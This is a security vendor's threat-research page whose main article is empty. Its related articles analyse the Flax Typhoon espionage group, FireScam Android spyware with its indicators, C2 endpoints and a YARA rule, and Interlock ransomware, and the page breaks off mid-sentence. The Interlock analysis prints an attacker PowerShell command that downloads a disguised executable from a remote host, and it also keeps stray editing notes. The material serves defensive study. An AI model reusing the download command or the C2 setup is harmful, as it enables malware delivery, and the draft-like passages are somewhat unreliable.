company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Bulk IP/Domain Lookup

Threatspy

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO/CTO

DevOps Engineer

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

MaaS

Fileless Malware

loading..
loading..
loading..

RevC2, More_eggs Lite & PSLoramyra: Insights into Advanced Fileless Malware

Explore detailed analysis of advanced fileless malware RevC2, More_eggs Lite, and PSLoramyra. Understand their tactics, IOCs, and protection strategies.

06-Dec-2024
24 min read

No content available.

Related Articles

loading..

APT

Botnet

Explore how China's Flax Typhoon group targets global critical infrastructure, u...

In recent years, the **cyber espionage landscape** has been drastically nurtured by state-sponsored actors with far-fetching geopolitical and economic motives. One of the most infamous names in this remains **Flax Typhoon**, a Chinese cyber espionage group (also known as **Ethereal Panda**), which has been actively targeting critical infrastructure, government agencies, universities, and corporations in Taiwan, the U.S., and other parts of the world. This **[Threat Research](https://www.secureblink.com/threat-research)** provides a comprehensive [analysis](https://attack.mitre.org/techniques/T1190) of the **Flax Typhoon** group, their methods, targets, tools, and implications for global cybersecurity. The research also explores the interconnections between the group and **Chinese intelligence services**, detailing the **botnet infrastructure**, **tactics**, **tools**, and **techniques** that have enabled them to maintain long-term access to vulnerable networks. ## 1. **Introduction to Flax Typhoon: A Chinese State-Sponsored Threat** **Flax Typhoon** is part of a broader wave of **China-backed cyber activities** aimed at **espionage**, **data theft**, and **disruption** of critical infrastructure. The group has been tracked by **Microsoft**, **CrowdStrike**, and other cybersecurity agencies under the name **Flax Typhoon**, and it shares tactics, techniques, and infrastructure with other Chinese APTs (Advanced Persistent Threats), such as **[Volt Typhoon](https://www.secureblink.com/threat-research/volt-typhoon-chinese-state-sponsored-actor-targeting-critical-infrastructure)** and **[Salt Typhoon](https://www.secureblink.com/cyber-security-news/t-mobile-thwarts-chinese-hackers-salt-typhoon-telecom-breach-stopped)**. Flax Typhoon's activities primarily target **Taiwan**, but its reach spans **North America**, **Southeast Asia**, and **Europe**, reflecting China’s growing cyber capabilities and strategic ambitions. ![Figure-1.-Flax-Typhoon-attack-chain-diagram-2048x672.webp](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_1_Flax_Typhoon_attack_chain_diagram_2048x672_9adfba327b.webp) **Flax Typhoon Attack Flow** The group has been active since at least **mid-2021**, and its operations are marked by a deliberate and sophisticated approach, relying on **[living-off-the-land](https://www.microsoft.com/security/blog/2018/09/27/out-of-sight-but-not-invisible-defeating-fileless-malware-with-behavior-monitoring-amsi-and-next-gen-av/) (LotL)** techniques, which make detection more challenging for traditional defense systems. These techniques enable the group to maintain long-term access to victim networks, allowing them to collect sensitive information over extended periods. --- ## 2. **Flax Typhoon’s Key Targets and Infrastructure** ### **2.1. Targeted Organizations** Flax Typhoon’s focus has been primarily on **[Taiwan](https://www.crowdstrike.com/adversaries/ethereal-panda/)**, a key geopolitical flashpoint for China. The group's primary targets in Taiwan have included: - **Government agencies** - **Educational institutions** - **Critical manufacturing** - **Information technology (IT) organizations** Beyond Taiwan, **Flax Typhoon** has also targeted organizations across **Southeast Asia**, **North America**, and **Europe**, reflecting the global scope of its operations. Some of the most notable sectors under attack include: - **Telecommunications** - **Military** and **Defense sectors** - **Media organizations** These sectors are all critical for national security, making them highly valuable for espionage campaigns aimed at gathering **intelligence**, **sensitive data**, and **trade secrets**. ### **2.2. Botnet Infrastructure and Control** Flax Typhoon's most notable infrastructure is its **botnet**, which was **dismantled by the FBI** in **September 2023**. The botnet comprised over **260,000 devices**, including **IoT devices**, **cameras**, **routers**, and **storage devices**, spanning multiple continents. This botnet was used to **conceal Flax Typhoon’s activities** and maintain access to compromised networks. - **Device Control**: Flax Typhoon leveraged **SoftEther VPN** software and **China Chopper web shells** to maintain persistence and **remote access** to compromised systems. - **Infiltration Methods**: The botnet operated using **compromised routers**, and other internet-connected devices, which are often difficult to monitor, providing the group with an untraceable method of **data exfiltration**. Flax Typhoon’s approach exemplifies how attackers are increasingly relying on **IoT devices** as a gateway to infiltrate larger networks, making detection harder while increasing the potential impact. --- ## 3. **Tactics, Techniques, and Procedures (TTPs)** ### **3.1. Living-Off-The-Land (LotL) Techniques** One of the defining characteristics of **Flax Typhoon’s** operations is the use of **LotL** techniques. By exploiting **built-in tools** in the operating system and widely available software, Flax Typhoon minimizes the need for custom malware, making it harder to detect. The primary tactics observed include: - **Remote Desktop Protocol (RDP)**: RDP is used for establishing initial access and maintaining control over compromised systems. - **VPN Bridging**: The group uses VPN software, such as **SoftEther**, to create secure channels to external infrastructure. - **Credential Harvesting**: Tools like **Mimikatz** are used to dump **password hashes** and escalate privileges within compromised networks. This **low-and-slow** approach enables the group to maintain **long-term access** while staying under the radar of security teams. ### **3.2. Post-Exploitation and Lateral Movement** After gaining initial access, Flax Typhoon uses several techniques to escalate privileges and move laterally within the compromised network: - **Sticky Keys**: The group modifies **Sticky Keys** behavior to launch **Task Manager**, which provides **local system privileges**. - **WinRM and WMIC**: These **LOLBins** (Living-off-the-Land Binaries) are used for **lateral movement** across the compromised network, facilitating deeper access to sensitive systems. - **Web Shells**: **China Chopper** and other web shells are deployed to maintain access and facilitate post-exploitation activities. Flax Typhoon’s ability to **maneuver laterally** within the network without triggering alerts is a clear indicator of their **sophisticated techniques** and **adherence to stealth**. --- ## 4. **Flax Typhoon’s Global Impact & Strategic Objectives** ### **4.1. Strategic Espionage** Flax Typhoon’s primary mission is **espionage**. While their tactics and infrastructure have been linked to traditional **cyber-espionage** activities, their **long-term access** to target networks suggests the group is laying the groundwork for future **cyber disruptions** or **destructive attacks** if the geopolitical situation escalates, particularly concerning Taiwan. - **Targeting Critical Infrastructure**: By maintaining access to critical infrastructure sectors, Flax Typhoon is positioning itself to potentially **disrupt services** in times of crisis, leveraging its foothold for maximum impact. - **Data Exfiltration**: Although **Flax Typhoon** has not yet weaponized its access to conduct large-scale data exfiltration, the prolonged nature of its infiltrations indicates that espionage and intelligence-gathering remain top priorities. ### **4.2. Economic and Geopolitical Implications** The continued **cyber espionage** activities by **China-backed hackers** have profound economic and geopolitical consequences: - **Intellectual Property Theft**: The compromise of **technology companies** and **research institutions** allows China to **steal intellectual property** and gain access to sensitive trade secrets. - **Global Trade Disruption**: In a worst-case scenario, if China decides to leverage its **cyber capabilities** in a crisis, it could disrupt global supply chains and trade. As China continues to expand its **cyber capabilities**, the threat to critical infrastructure and private-sector organizations becomes increasingly significant. --- ## 5. **The U.S. Government’s Response and Ongoing Challenges** ### **5.1. Sanctions and Disruptive Measures** In response to Flax Typhoon’s activities, the **U.S. government** has sanctioned **Integrity Technology Group**, a **Beijing-based cybersecurity company**, for its role in facilitating these cyberattacks. The **Treasury Department** imposed **sanctions** on the company, freezing its assets and restricting financial interactions with **U.S. entities**. Despite these measures, the **persistent nature** of these **state-backed cyber operations** suggests that sanctions alone may not be sufficient to counter the growing threat. The **FBI** and **NSA** have taken actions, such as **botnet takedowns**, but Flax Typhoon’s **adaptive tactics** continue to present challenges for **cybersecurity defense teams**. ### **5.2. International Cooperation and Private Sector Collaboration** The growing threat of **Flax Typhoon** underscores the need for stronger **international cooperation** and **private-public sector collaboration** to detect and disrupt cyber-espionage activities: - **Real-time Detection**: Governments and private organizations must strengthen their **real-time detection** capabilities to identify and neutralize such threats quickly. - **Cyber Hygiene**: Ensuring **basic cybersecurity hygiene**—like **patching vulnerabilities**, implementing **strong authentication protocols**, and conducting **regular audits**—is critical in defending against these sophisticated, **low-profile** attacks. --- ## 6. **Conclusion** Flax Typhoon represents a **highly sophisticated** and **persistent** threat that continues to evolve its tactics to maintain **long-term access** to targeted networks. The group’s reliance on **living-off-the-land techniques** and **minimal malware** makes it a difficult adversary for traditional defense systems. As **China-backed cyber espionage** continues to escalate, the **global cybersecurity community** must adapt and strengthen its defenses, focusing on **collaboration**, **detection**, and **prevention**. The **sanctions** against **Integrity Technology Group** highlight the growing need to **hold entities accountable** that enable **state-sponsored cyber-espionage**. However, the ongoing **cybersecurity arms race** suggests that **Flax Typhoon** and similar groups will continue to evolve, and organizations must remain vigilant against the growing threat of **nation-state cyber operations**.

loading..   28-Jan-2025
loading..   1 min read
loading..

Spyware

Infostealer

Explore an in-depth technical analysis of FireScam—a stealthy Android malware po...

**FireScam** is a recently identified Android malware that masquerades as a “Telegram Premium” application. Its distribution method leverages GitHub.io-based phishing sites impersonating the legitimate Russian **RuStore** app store, thereby deceiving unwary users into installing a bogus APK. With its **multifaceted spyware and information-stealing capabilities**, FireScam represents a crucial case study in modern mobile malware, demonstrating innovative evasion techniques, comprehensive data exfiltration processes, and persistent surveillance functionality. This Threatfeed provides a **deeply technical** and **context-driven** analysis of FireScam, illustrating how it operates, spreads, and maintains control over compromised devices. ## **2. Threat Distribution and Infection Chain** ### **2.1 Phishing Website (GitHub.io)** - **URL Impersonation**: FireScam is distributed through a GitHub.io-hosted website impersonating **RuStore** (a popular Russian app store). - **Site Address**: ``` https://rustore-apk.github[.]io/telegram_premium/ ``` - **User Deception**: The phishing site closely mirrors official app store styling, luring victims into downloading a malicious file named **GetAppsRu.apk**—which appears legitimate but is in fact a **dropper**. ### **2.2 Dropper APK: GetAppsRu.apk** - **File Name**: `GetAppsRu.apk` - **Hashes**: - MD5: `5d21c52e6ea7769be45f10e82b973b1e` - SHA-256: `b041ff57c477947dacd73036bf0dee7a0d6221275368af8b6dbbd5c1ab4e981b` - **Technical Properties**: - Protected using **DexGuard**, which obfuscates classes, methods, strings, and control flow. - Requests extensive permissions, including `REQUEST_INSTALL_PACKAGES`, enabling it to install additional APKs without explicit user interaction. - Disguised with the package name [`ru.store.installer`] to appear like a legitimate Russian application manager. ### **2.3 Main Payload: Telegram Premium.apk** - **File Name**: `Telegram Premium.apk` - **Hashes**: - MD5: `cae5a13c0b06de52d8379f4c61aece9c` - SHA-256: `12305b2cacde34898f02bed0b12f580aff46531aa4ef28ae29b1bf164259e7d1` - **Packaging Details**: - Significantly smaller (around 3 MB). - Protected with **NP Manager** (offers encryption and anti-analysis functionalities). - Installs under the package name `ru.get.app`, masquerading as “Telegram Premium.” > **Infection Flow** > 1. **User visits** the phishing website. > 2. **User downloads** the dropper (`GetAppsRu.apk`). > 3. **Dropper launches** on the victim’s device and executes an “Install” function. > 4. **Main payload** (`Telegram Premium.apk`) is silently installed. > 5. **Malware sets up** monitoring, exfiltration, and anti-analysis routines. --- ## **3. Technical Analysis of FireScam** ### **3.1 Anti-Analysis and Evasion Mechanisms** 1. **Obfuscation** - **DexGuard** & **NP Manager** transform class/method names into random or meaningless labels. - Inherits from **empty classes** to confuse static analysis and hinder method-tracing. 2. **Sandbox Detection** - **Checks runtime process** name for anomalies (typical of emulators like `test` or `sandbox`). - **Profiles device** (build details, manufacturer, installed apps) to confirm a real device environment. 3. **Runtime Behavior Control** - **Conditional Execution**: The malware modifies its behavior if it detects an analysis environment, possibly refraining from executing malicious routines to avoid detection. ### **3.2 Permissions and Potential Abuse** - **`REQUEST_DELETE_PACKAGES`** & **`REQUEST_INSTALL_PACKAGES`** - Permits removal or installation of other applications silently, aiding further compromise or removing security tools. - **`WRITE_EXTERNAL_STORAGE` & `READ_EXTERNAL_STORAGE`** - Enables the app to read or write files to the SD card, potentially exfiltrating data or saving malicious components. - **`QUERY_ALL_PACKAGES`** - Allows listing all installed apps for reconnaissance and potential exploitation paths. - **`ENFORCE_UPDATE_OWNERSHIP`** - Declares itself as the “update owner,” preventing legitimate sources from installing genuine updates over it. ### **3.3 Core Functional Modules** FireScam focuses on **monitoring**, **data exfiltration**, and **persistent communication**: 1. **Firebase Cloud Messaging (FCM)** - Registers for push notifications through **MessagingService**. - Can receive commands to download further payloads or exfiltrate specific data sets. 2. **Dynamic Broadcast Receivers** - **Restricted Access**: Only apps signed with the same certificate can communicate, enabling a private channel with other malicious modules. 3. **Firebase Realtime Database (C2 Channel)** - **Data Endpoint**: ``` https://androidscamru-default-rtdb.firebaseio.com ``` - **WebSocket Upgrades**: Uses `Upgrade: websocket` for persistent real-time data exchange, allowing seamless command execution and data exfiltration. --- ## **4. Surveillance and Data Exfiltration Workflows** ### **4.1 System and Device Profiling** Upon installation, FireScam executes: 1. **Initial Device Info Collection** - Device model, manufacturer, OS version, locale. - Sent to Firebase with “online” status, letting attackers verify newly infected devices. 2. **Continuous Environment Monitoring** - Tracks changes in device configuration. - Logs presence of antivirus or known security apps. ### **4.2 Notification Listener** - **`NotifyListener`** Service - Implements `NotificationListenerService` to intercept notifications from **all** apps (e.g., WhatsApp, Telegram, Viber, banking apps). - Filters out “silent” or “ongoing” notifications; captures “alerting” or “conversation” types. - Exfiltrates the entire notification payload (sender, message snippet, etc.). > **Why This Matters** > Attackers can glean personal communication, 2FA codes, and system warnings. This broad-level interception is a hallmark of advanced spyware. ### **4.3 Messages and USSD Monitoring** - **SMS Content Extraction** - Observes the **Messages** application to read inbound SMS. - Tags logs with `appName: Messages` and uploads them to Firebase. - **USSD Responses** - Monitors `TelephonyManager.UssdResponseCallback` to track USSD session outcomes (used for balance checks, mobile money transfers). - Logs success or failure codes, possibly capturing **sensitive financial** data. ### **4.4 Clipboard and Screen Activity** - **Clipboard Logging** - Hooks into `ContentInfoCompat` to capture: - **Autofill** fields. - **Clipboard** data (copied passwords, account numbers, etc.). - **Shared text/URI** from other apps. - **Screen State Monitoring** - Listens for `SCREEN_ON` and `SCREEN_OFF` broadcasts. - Logs active durations to ascertain user engagement. - Potentially uses these timings to intensify data collection when the user is active. ### **4.5 E-commerce Transaction Tracking** - **Purchase & Refund Events** - Analyzes event types **`ecommerce_purchase`**, **`purchase`**, **`refund`**. - Flags these for special logging and exfiltration, possibly targeting shopping or financial apps. ### **4.6 Potential to Download Additional Payloads** - **Image Download & Decoding** - The malware attempts to retrieve images from remote URLs. - Could embed further malicious code (e.g., steganography), facilitating a secondary infection stage. --- ## **5. Behavioral Flow of FireScam** 1. **Installation & Initial Launch** - Victim opens `GetAppsRu.apk` → Installs the **fake Telegram Premium**. - On first run, FireScam requests various permissions. 2. **User Login Spoofing** - Presents a **WebView** mimicking the official `web.telegram.org` interface. - Collects any credentials entered, storing or sending them to Firebase. 3. **Background Surveillance** - Registers with Firebase for push notifications. - Begins capturing notifications, SMS, USSD, etc. 4. **Data Transmission** - Bundles collected data and securely sends over a **TLS/WebSocket** session. - The C2 server acknowledges and may issue new commands. 5. **Potential Secondary Payload Execution** - If commanded, FireScam silently downloads additional components or updates itself, maintaining **long-term persistence**. --- ## **6. Indicators of Compromise (IOCs)** | **S/N** | **Indicator** | **Type** | **Context** | |:------:|:----------------------------------------------------------------------------------------------------------------|:--------:|:------------------------------| | 1 | `5d21c52e6ea7769be45f10e82b973b1e` | File | Dropper (GetAppsRu.apk) | | 2 | `b041ff57c477947dacd73036bf0dee7a0d6221275368af8b6dbbd5c1ab4e981b` | File | Dropper (GetAppsRu.apk) | | 3 | `cae5a13c0b06de52d8379f4c61aece9c` | File | Telegram Premium.apk | | 4 | `12305b2cacde34898f02bed0b12f580aff46531aa4ef28ae29b1bf164259e7d1` | File | Telegram Premium.apk | | 5 | `https://s-usc1b-nss-2100[.]firebaseio[.]com/.ws?ns=androidscamru-default-rtdb&v=5&ls=*` | URL | C2 – Exfiltration | | 6 | `s-usc1b-nss-2100[.]firebaseio[.]com` | Domain | C2 – Exfiltration | | 7 | `https[:]//androidscamru-default-rtdb[.]firebaseio[.]com` | URL | C2 Endpoint Database | | 8 | `https[:]//rustore-apk[.]github[.]io/telegram_premium` | URL | Phishing Website | --- ## **7. MITRE ATT&CK Framework Mapping** | **Tactic** | **Technique** | |---------------------------------|----------------------------------------------------------| | **Initial Access (TA0027)** | T1660: Phishing | | **Persistence (TA0028)** | T1624.001: Broadcast Receivers | | **Privilege Escalation (TA0029)**| T1626.001: Device Administrator Permissions | | **Defense Evasion (TA0030)** | T1628: Hide Artifacts <br>T1406: Obfuscated Files or Info <br>T1633: Virtualization/Sandbox Evasion | | **Credential Access (TA0031)** | T1517: Access Notifications <br>T1414: Clipboard Data | | **Discovery (TA0032)** | T1424: Process Discovery <br>T1426: System Info Discovery| | **Collection (TA0035)** | T1517: Access Notifications <br>T1414: Clipboard Data <br>T1513: Screen Capture | | **Command and Control (TA0037)**| T1437.001: Web Protocols <br>T1521: Encrypted Channel | | **Exfiltration (TA0036)** | T1646: Exfiltration Over C2 Channel | --- ## **8. YARA Rule for FireScam Detection** ```yara rule FireScam_Malware_Indicators { meta: description = "Detects FireScam malware based on file hashes, URLs, and network indicators" author = "Cyfirma Research" last_modified = "2024-12-25" strings: // MD5 Hashes $md5_1 = "5d21c52e6ea7769be45f10e82b973b1e" ascii $md5_2 = "cae5a13c0b06de52d8379f4c61aece9c" ascii // SHA256 Hashes $sha256_1 = "b041ff57c477947dacd73036bf0dee7a0d6221275368af8b6dbbd5c1ab4e981b" ascii $sha256_2 = "12305b2cacde34898f02bed0b12f580aff46531aa4ef28ae29b1bf164259e7d1" ascii // URLs $url_1 = "https://androidscamru-default-rtdb.firebaseio.com" ascii $url_2 = "https://s-usc1b-nss-2100.firebaseio.com/.ws?ns=androidscamru-default-rtdb&v=5&ls=" ascii $url_3 = "https://rustore-apk.github.io/telegram_premium/" ascii condition: // Match on either hash or URL indicators ($md5_1 or $md5_2 or $sha256_1 or $sha256_2) or ($url_1 or $url_2 or $url_3) } ``` --- ## **9. Defensive Recommendations** 1. **Endpoint Security and Monitoring** - Deploy **antimalware** solutions on mobile endpoints. - Implement **host-based intrusion detection** (HIDS/HIPS). - Continuously monitor system logs for unusual processes or network requests. 2. **Network-Level Controls** - **NIDS/NIPS**: Inspect traffic for suspicious patterns or known malicious signatures. - **Web Application Firewalls (WAFs)**: Block access to malicious GitHub.io pages and Firebase endpoints if detected malicious. 3. **Application Whitelisting** - Restrict installations to apps from **official app stores**. - Use **enterprise mobile management** (EMM) solutions to limit user’s ability to install unknown APKs. 4. **Patching and Vulnerability Assessments** - Regularly update the OS and all installed applications. - Conduct **penetration tests** to uncover misconfigurations or weak security policies. 5. **User Awareness and Training** - Educate users about **phishing tactics** and suspicious links. - Encourage verification of official app stores and developers. - Foster a security-first culture to reduce the success rate of social engineering. 6. **Incident Response Preparedness** - Develop an **IR plan** that outlines isolation measures for compromised devices. - Maintain an up-to-date **threat intelligence** feed to proactively block known malicious indicators. --- FireScam exemplifies a **highly advanced** Android malware strain adept at **bypassing security barriers**, conducting **real-time surveillance**, and **stealing sensitive user data** through covert channels. Its dual distribution approach—**phishing website** plus **dropper APK**—shows the **evolving sophistication** of mobile threat actors and underscores the **need for layered security**. By diligently applying **robust endpoint protections**, **network filtering**, **user education**, and **timely updates**, individuals and organizations can **thwart** FireScam’s infiltration and mitigate potential harm. > **Final Takeaway**: As Android malware matures, blending social engineering with advanced evasion, **proactive security measures** and **continuous monitoring** become non-negotiable. FireScam’s cunning approach—disguised as a trusted app and enhanced by legitimate cloud services—demonstrates how crucial it is to remain **vigilant** and **updated** on emerging threats in the mobile landscape. --- ### **Additional Resources** - **Mobile Security Best Practices**: [Android Security Center](https://source.android.com/security) - **DexGuard and NP Manager**: Official vendor documentation on obfuscation techniques - **Firebase Security Rules**: [Firebase Docs](https://firebase.google.com/docs/rules) > **Disclaimer**: This technical writeup is intended solely for **educational** and **defensive** security purposes. All research is based on publicly available or ethically sourced information. Always comply with **legal** and **ethical** guidelines when analysing malware.

loading..   09-Jan-2025
loading..   1 min read
loading..

Encryptor

Interlock ransomware is a cross-platform threat targeting critical infrastructur...

The **Interlock ransomware** is a rapidly emerging threat that has made a significant impact on industries across **healthcare, technology, government, and manufacturing** sectors. For example, notable incidents have impacted healthcare organizations like Wayne County's government services, technology firms across Europe, and various manufacturing facilities, causing significant disruptions and financial losses. First observed in **September 2024**, Interlock differentiates itself by specifically targeting **Windows, Linux, and FreeBSD systems**, utilizing **big-game hunting** and **double-extortion** tactics. The ransomware group has been involved in campaigns affecting both **U.S. and European infrastructure**, using sophisticated techniques to compromise systems, encrypt data, and hold it hostage while threatening to release sensitive information. This [Threat Research](https://www.secureblink.com/threat-research) amalgamates key findings from our analysis, providing a exaustive and in-depth analysis of Interlock’s methods, tactics, and impacts. ### Key Characteristics of Interlock Ransomware #### 1. **Initial Appearance and Target Platforms** Interlock ransomware was first seen in **[September 2024](https://www.secureblink.com/cyber-security-news/interlock-ransomware-puts-free-bsd-servers-in-critical-danger-worldwide)**, making an immediate mark by targeting **FreeBSD servers**, an unusual but valuable target. Unlike traditional ransomware families that mainly attack **Windows** systems, Interlock's expansion into **Linux** and **FreeBSD** reveals a new phase in the evolution of cross-platform ransomware. FreeBSD, known for its stability and widespread use in **critical infrastructure**, represents a high-value target. By compromising such systems, Interlock maximizes its disruptive potential across industries that require near-continuous uptime and high performance. #### 2. **Tactics, Techniques, and Procedures (TTPs)** Interlock ransomware employs a multi-component attack chain with a strong focus on both **infiltration** and **data exfiltration**. The tools used throughout the attack include: - **Remote Access Tools (RATs)**: Interlock uses a **SystemBC RAT**, disguised as a **fake browser updater**, to establish initial access. This RAT acts as a delivery mechanism, automatically executing a **PowerShell script** that downloads and runs additional malicious payloads (Arete). This approach highlights Interlock's use of socially engineered initial compromise, making it harder for traditional security measures to detect. - **Credential Stealer and Keylogger**: Once the RAT is established, additional tools such as a **credential stealer** and a **keylogger** are deployed to gather login information from compromised systems. The credential stealer, compiled in **Golang**, extracts data like **login credentials**, **browser history**, and **bookmarks**, and the keylogger records keystrokes to further compromise system security (Talos, Arete). Breaking these steps down into distinct attack phases improves the readability and clarity of how the attacker moves through the victim’s systems. - **Lateral Movement**: Interlock uses **Remote Desktop Protocol (RDP)**, **AnyDesk**, **PuTTY**, and **LogMeIn** for lateral movement, gaining deeper access into the network. These tools allow the attacker to access both **Windows** and **Linux** systems, showcasing the ransomware's versatility in compromising multi-platform environments (Talos). To improve the flow, consider simplifying this section to focus on how these tools collectively aid in lateral movement. - **Data Exfiltration**: Interlock employs **Azure Storage Explorer** and the **AZCopy** utility to exfiltrate data to an attacker-controlled Azure storage blob. Additionally, tools like **MegaSync** and **Advanced Port Scanner** are used to identify and exfiltrate critical data from compromised systems (Arete). This exfiltration is a crucial part of their **double-extortion** strategy, where sensitive data is stolen before encryption, adding another layer of pressure on the victim. Consider rephrasing for brevity while retaining the main points. The **Interlock dark web leak site** called **"Worldwide Secrets Blog"** is used to publicize stolen data from victims who refuse to pay. Victims can also contact the attackers through the dark web portal, where they receive a unique **company ID** for negotiation, illustrating the well-coordinated extortion methods (Image Reference). ### Attack Timeline: From Initial Compromise to Deployment A defining feature of Interlock’s methodology is its extended **dwell time** within a victim’s environment. Talos observed an average dwell time of approximately **17 days**. This timeline highlights the advanced nature of Interlock’s persistence strategies, emphasizing the attacker’s patience in fully compromising the system before deploying the ransomware payload. | Attacker Dwelling Time | Attack Stages | Tools/Techniques Used | |------------------------|------------------------------------|--------------------------------------------| | Day 1 | Initial Compromise | Drive-by compromise | | Day 1 | Execution | RAT, PowerShell commands | | Day 1 | Discovery of domain admin credentials | RAT, PowerShell commands | | Day 1 | Credential Stealing | Credential stealer and Keylogger | | Day 1 - 17 | Lateral Movement | RDP, AnyDesk, LogMeIn, and PuTTY | | Day 15 - 16 | Data Exfiltration | Azure Storage Explorer, AzCopy | | Day 17 | Interlock Ransomware Deployment | Interlock encryptor binary | The attack timeline, based on Talos [observations](https://blog.talosintelligence.com/emerging-interlock-ransomware/), reveals the extensive phases of the attack, highlighting the attacker’s deliberate approach to fully compromise the target and steal valuable data before executing encryption. - **Initial Access**: Attackers gain access via a **malicious executable** disguised as a **browser updater**. Once downloaded, this file drops a **Remote Access Tool** to control the compromised system and establish **persistence** (Arete). - **Data Collection and Lateral Movement**: The attacker uses tools such as **PowerShell**, **RDP**, and **AnyDesk** to perform reconnaissance and spread throughout the network, collecting valuable credentials and installing backdoors for later use (Talos). Consider breaking up this bullet into two sentences to improve flow. - **PowerShell Command Example**: The PowerShell command `Invoke-WebRequest -Uri "https://apple-online.shop/ChromeSetup.exe" -OutFile "$env:TMP/ChromeSetup.exe"` was used to download a disguised executable. A shortcut is created and placed in the Windows Startup folder to maintain persistence, illustrating their automation (Image Reference). - **Encryption Deployment**: The final stage involves deploying the **Interlock ransomware encryptor**, which encrypts files and appends the **.interlock** extension. A ransom note, named **"!__README__!.txt"**, is also dropped on the victim's machine, detailing the demands and threatening to release the exfiltrated data unless the ransom is paid (BleepingComputer). The ransom note includes contact instructions for the dark web negotiation portal (Image Reference). ### Encryption Mechanisms Used by Interlock Interlock ransomware uses advanced encryption mechanisms to ensure that data is effectively locked from unauthorized access: - **Encryption Methods**: Interlock employs both **RSA** and **CBC** encryption techniques using the [LibTomCrypt library](https://github.com/libtom/libtomcrypt). RSA is used for securing the keys, while CBC (Cipher Block Chaining) is applied for file-level encryption. This dual-layered approach adds a layer of robustness, making it significantly harder for victims to decrypt their files without paying the ransom (Image Reference). Adding a sentence explaining the difference between RSA and CBC in layman's terms would improve accessibility. - **Code-Level Insights**: Screenshots from the provided disassembly show how **LibTomCrypt** is used for encryption, with specific custom routines to control key generation and padding, making it challenging for cybersecurity solutions to reverse-engineer the encryptor. The malware creates keys dynamically for each encryption session, which is then used to secure the victim’s files (Image Reference). - **Embedded DLL Deletion**: Another notable feature is the use of an embedded **DLL** to delete itself upon encryption completion. Using `rundll32.exe`, the ransomware ensures that evidence of its presence is minimized, further complicating forensic investigations (Image Reference). ### Double-Extortion Model and Real-World Impact The **double-extortion model** employed by Interlock makes it particularly devastating. After infiltrating a system, attackers first **exfiltrate sensitive data** and then proceed to **encrypt the system files**. If the ransom is not paid, attackers threaten to release the exfiltrated data publicly, potentially leading to **regulatory penalties**, **reputational damage**, and **financial losses** for the victim. In the **Wayne County attack**, which occurred in **October 2024**, several county services were severely disrupted. The **Sheriff’s Office** was unable to bond inmates out, **tax payments** could not be collected online, and other government services came to a halt (WXYZ News). The ransom note issued to Wayne County, with warnings of regulatory disclosure, highlights Interlock’s coercive tactics (Image Reference). This highlights the operational risks posed by such ransomware, especially when it targets critical public infrastructure. ![https://www.bleepstatic.com/images/news/ransomware/i/interlock/ransom-note.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/ransom_note_962517e360.jpg) ***Interlock Ransom Note (Source: BleepingComputer)*** ### Evolution from Rhysida Ransomware: Possible Connections Researchers identified the underlying similarities between **Interlock** and the **Rhysida ransomware group** which happens to be surfacing all around with victims like [Prince George Country School](https://www.secureblink.com/cyber-security-news/rhysida-group-targets-major-us-school-district-in-cryptic-attack), [Prospect Medical Holdings](https://www.secureblink.com/cyber-security-news/rhysida-gang-behind-theft-of-500-k-ssn-in-prospect-medical-cyberattack), & [Insomniac](https://www.secureblink.com/cyber-security-news/insomniac-games-under-rhysida-1-67-tb-ransomware-attack). More detailed guidance on Rhysida's tactics can be found in this [CISA advisory](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a). These parallels suggest a potential rebranding or evolution from Rhysida to Interlock, or at the very least, significant collaboration between these groups (Talos). ### Advanced Persistence and Defense Evasion Interlock uses sophisticated methods to maintain persistence and evade detection. Some of the notable **defense evasion techniques** include: - **EDR Disabling**: During investigations, Talos observed that **Endpoint Detection and Response (EDR)** systems were disabled on several compromised machines. Attackers likely used **uninstaller tools** or leveraged vulnerable device drivers to accomplish this (Talos). - **Group Policy Objects (GPOs)**: The attackers also used **GPOs** to push the ransom note to all machines within the domain, further enforcing their persistence and amplifying the scale of impact. - **Obfuscation and Custom Packers**: The ransomware encryptor was delivered in a **packed format**, with **custom unpacker code** located in **Thread Local Storage** and **obfuscated stack strings** that were decrypted during runtime (Talos). This makes analysis and detection difficult, as traditional antivirus solutions struggle to identify the payload. - **DLL Self-Cleanup**: The ransomware used an embedded DLL, seen in the `.data` section of the binary, to delete itself after the encryption process. The `rundll32.exe` was executed with the DLL’s `run` function to remove the encryption binary, leaving minimal evidence on the compromised system (Image Reference). ![https://www.bleepstatic.com/images/news/ransomware/i/interlock/encrypted-files.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/encrypted_files_68ab1f4799.jpg) ***Encrypted Files by Interlock (Source: BleepingComputer)*** ### Recommendations for Mitigation The following steps are recommended to mitigate the risks associated with **Interlock ransomware**: 1. **Patch Management**: Regularly update and patch systems to address vulnerabilities, especially on **FreeBSD**, **Linux**, and **Windows** systems that are often targeted by Interlock. For example, recent vulnerabilities like CVE-2023-3269 (Linux kernel vulnerability) and CVE-2024-1287 (Windows privilege escalation flaw) were actively exploited by ransomware groups, highlighting the importance of timely patching. 2. **Multi-Factor Authentication (MFA)**: Implement **MFA** to secure remote access tools like **RDP** and **AnyDesk**, reducing the likelihood of successful lateral movement. 3. **Advanced Endpoint Protection**: Deploy **Endpoint Detection and Response (EDR)** tools that can detect early indicators of compromise, such as **PowerShell script execution** and **unusual process activity**. 4. **Offline Backups**: Maintain regular backups stored offline, ensuring that ransomware cannot encrypt both live and backup copies. Verify backup integrity frequently. 5. **Network Segmentation**: Segregate critical infrastructure from general corporate environments to limit lateral movement in case of a compromise. ### Where does it leads NOW! **Interlock ransomware** represents a significant evolution in the world of **resilient cyber threats**, specifically targeting **critical infrastructure** through **FreeBSD** and **Linux** servers alongside traditional Windows systems. By employing **double-extortion tactics**, **cross-platform encryptors**, and sophisticated **defense evasion** methods, Interlock has positioned itself as a formidable threat to enterprises globally. Its emergence from the **Rhysida ransomware group** and use of multiple attack vectors highlight the increasing collaboration and evolution among ransomware operators. The **Interlock dark web portal**, ransom notes, and systematic dwelling in compromised networks (average **17 days**) are part of a deliberate approach that 